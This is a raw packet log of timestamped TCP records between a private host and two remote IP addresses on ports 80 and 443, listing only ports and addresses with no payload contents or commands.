Oct 8, 2024 20:47:33.062480927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063034058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063087940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063087940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063122988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063133001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063157082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063172102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063205957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063225031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063257933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063278913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063292027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063303947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063319921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063366890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063585043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063637972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063638926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063672066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063684940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063721895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063767910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063800097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063822031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063831091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063839912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063863993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063874960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063898087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.063920021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.063946009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064008951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064043045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064058065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064076900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064090014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064110994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064120054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064148903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064162016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064187050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064201117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064228058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064237118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064275026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064280033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064311981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064342976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064343929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064359903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064376116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064388990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064409971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064419985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064441919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064459085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064476013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064492941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064510107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064526081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064560890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064683914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064738035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064749956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064780951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064831018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064862013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064894915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064915895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064928055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064939022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064963102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.064975977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.064995050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065012932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065043926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065169096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065201044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065226078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065237999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065238953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065283060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065290928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065325022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065340996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065356970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065373898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065392017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.065407991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.065440893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066653967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066663027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066668987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066711903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066719055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066730976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066761017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066791058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066801071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066809893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066838026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066845894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066858053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066904068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.066930056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066941023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.066976070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067054987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067065001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067074060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067085028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067095995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067106009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067121983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067141056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067157984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067167044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067177057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067209959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067219973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067267895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067279100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067289114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067298889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067313910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067338943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067456961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067466974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067476988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067487955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067497969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067504883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067511082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067523003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067523956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067540884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067563057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067713022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067722082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067727089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067738056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067748070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067759037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067768097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067770004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067783117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.067790031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067807913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.067816019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.087887049 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.088699102 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.088781118 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.089200020 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.089215994 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.148221970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148241043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148252010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148262024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148273945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148283958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148294926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148390055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148449898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148508072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148538113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148566961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148588896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148617029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148649931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148683071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148730993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148746967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148766041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148783922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148818970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148819923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148853064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148870945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148885965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148919106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148921013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148941040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148952007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148972034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.148983955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.148997068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149019957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149035931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149049044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149070978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149099112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149236917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149270058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149287939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149307966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149322033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149343014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149358034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149393082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149395943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149431944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149446011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149481058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149488926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149522066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149539948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149557114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149573088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149590969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149606943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149624109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149641991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149658918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149673939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149693966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149710894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149733067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.149749994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.149782896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150006056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150063038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150075912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150110006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150125027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150157928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150230885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150264025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150286913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150298119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150300980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150333881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150345087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150383949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150810957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150863886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150866032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150897980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150911093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150948048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.150964022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.150995970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151017904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151041985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151048899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151082039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151101112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151115894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151129961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151151896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151165009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151201010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151205063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151237011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151254892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151269913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151288033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151304007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151320934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151338100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151355028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151371002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151392937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151422977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151424885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151477098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151506901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151539087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151572943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151573896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151592016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151606083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151618958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.151642084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.151694059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152287960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152344942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152405977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152440071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152457952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152487993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152493954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152527094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152543068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152561903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152576923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152596951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.152612925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.152647972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153636932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153665066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153691053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153698921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153709888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153748035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153752089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153784990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153800964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153817892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153835058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153852940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153867006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153898954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153904915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153938055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.153958082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.153970003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154001951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154001951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154019117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154036045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154052019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154064894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154086113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154109955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154115915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154149055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154165030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154189110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154202938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154222965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154237986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154268980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154277086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154310942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154325008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154345036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154356956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154376984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154393911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154422998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154428959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154462099 CEST	80	49755	95.164.90.97	192.168.2.5
